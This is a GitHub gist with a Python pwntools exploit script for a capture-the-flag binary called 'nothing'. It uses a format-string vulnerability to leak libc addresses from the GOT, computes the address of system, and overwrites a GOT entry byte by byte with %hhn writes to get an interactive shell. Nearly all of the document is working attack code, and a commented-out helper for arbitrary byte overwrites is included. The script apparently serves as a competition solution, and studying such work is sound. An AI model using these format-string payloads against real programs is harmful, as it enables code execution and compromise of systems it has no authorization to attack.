Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env python3
import sys
import pwn
import struct
import binascii
# nc pwn02.chal.ctf.westerns.tokyo 18247
if(len(sys.argv) > 1):
p = pwn.remote("pwn02.chal.ctf.westerns.tokyo",18247)
else:
p = pwn.process("./nothing")
input("Process PID is %d, connect now or hit enter..." % p.pid)
p.recvuntil("> ")
def leakPointer(addr):
global p
out = b""
out += b"%7$s\x00\x00\x00\x00"
out += pwn.p64(addr)
out += b"\n"
p.send(out)
x = p.recvuntil("> ")[:-2]
f = b"\x00" * (8 - len(x))
ptr_printf = struct.unpack("<q",x + f)
print("%x" % ptr_printf[0])
return ptr_printf
def sendFmtString(strin):
global p
p.send(strin)
x = p.recvuntil("> ",timeout=0.5)[:-2]
print(x)
# steps:
# leak libc
# can't one_gadget to victory
# one-shot printf to system.
got_read = leakPointer(0x601030)
got_setbuf = leakPointer(0x601020)
print("read is at %x" % got_read)
print("setbuf is at %x" % got_setbuf)
# printf is 0000000000064f00
libc_base = got_read[0] - 0x110180
libc_printf = libc_base + 0x64f00
libc_system = libc_base + 0x04ef50
# libc_magic = libc_base + 0x10a45
libc_magic = libc_base + 0x4ef50
print("libc_base is at %x" % libc_base)
print("libc_magic is at %x" % libc_magic)
print("libc_system is at %x" % libc_system)
# e0 in system makes it too hard to write...
firstByte = libc_magic & 0xFF
secondByte = (libc_magic & 0xFF00) >> 8
thirdByte = (libc_magic & 0xFF0000) >> 16
print("firstbyte: %02x" % firstByte)
print("second : %02x" % secondByte)
print("third : %02x" % thirdByte)
a = [firstByte,secondByte,thirdByte]
bx = [firstByte,secondByte,thirdByte]
if max(a) > 0xd0:
print("Fuckit, giving up")
sys.exit(0)
a.sort()
firstNum = a.pop(0)
out = b"A" * firstNum + b'%33$hhn'
secondNum = a.pop(0)
out += b"A" * (secondNum - firstNum) + b'%34$hhn'
thirdNum = a.pop(0)
out += b"A" * (thirdNum - secondNum) + b'%35$hhn'
# padding, otherwise this is fine.
out += b"\x00" * (0xd8 - len(out) )
out += pwn.p64(0x601028 + bx.index(firstNum))
out += pwn.p64(0x601028 + bx.index(secondNum))
out += pwn.p64(0x601028 + bx.index(thirdNum))
out += b"\n"
print(len(out))
print(out)
input("...")
sendFmtString(out)
p.interactive()
def overwriteAddress(addr,val,testMode = True,offsetAdjust = 0,extraPadding = 0):
global p
print("Attempting to overwrite exit, last byte with '%02x'" % val)
out = b""
ctr_out = 8 + (val / 8) + offsetAdjust
out += b"a" * val
if testMode is True:
out_added = b"%" + b"%d" % (ctr_out) + b"$x"
else:
out_added = b"%" + b"%d" % (ctr_out) + b"$hhn"
out_added += b"\x00" * (8 - len(out_added))
out += out_added
print(len(out))
out += b'\x00' * (val % 8)
out += b'\x00' * extraPadding
out += pwn.p64(addr)
if len(out) > 0x100:
print("Rejecting: len(out) = %d" % len(out))
else:
sendFmtString(out)
# firstbyte = (libc_base + 0x10a45c) & 0xFF
# secondbyte = ((libc_base + 0x10a45c) & 0xFF00) >> 8
# -lastbyte = ((libc_base + 0x10a45c) & 0xFF0000) >> 16
# overwriteAddress(0x601038,firstbyte)
# overwriteAddress(0x601039,secondbyte)
# overwriteAddress(0x601040,lastbyte)
# while True:
# cmd = input("cmd >").rstrip()
# tokens = cmd.split(" ")
# if tokens[0] == "r":
# print("Giving you control")
# p.interactive()
# elif tokens[0] == "t" and len(tokens) == 5:
# addr = int(tokens[1],16)
# val = int(tokens[2],16)
# offset = int(tokens[3])
# padding = int(tokens[4])
# print("Testing with address %x,value %x,offset %d,padding %d" % (addr,val,offset,padding))
# overwriteAddress(addr,val,testMode=True,offsetAdjust = offset,extraPadding = padding)
# elif tokens[0] == "w" and len(tokens) == 5:
# addr = int(tokens[1],16)
# val = int(tokens[2],16)
# offset = int(tokens[3])
# padding = int(tokens[4])
# print("Testing with address %x,value %x,offset %d,padding %d" % (addr,val,offset,padding))
# overwriteAddress(addr,val,testMode=False,offsetAdjust = offset,extraPadding = padding)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment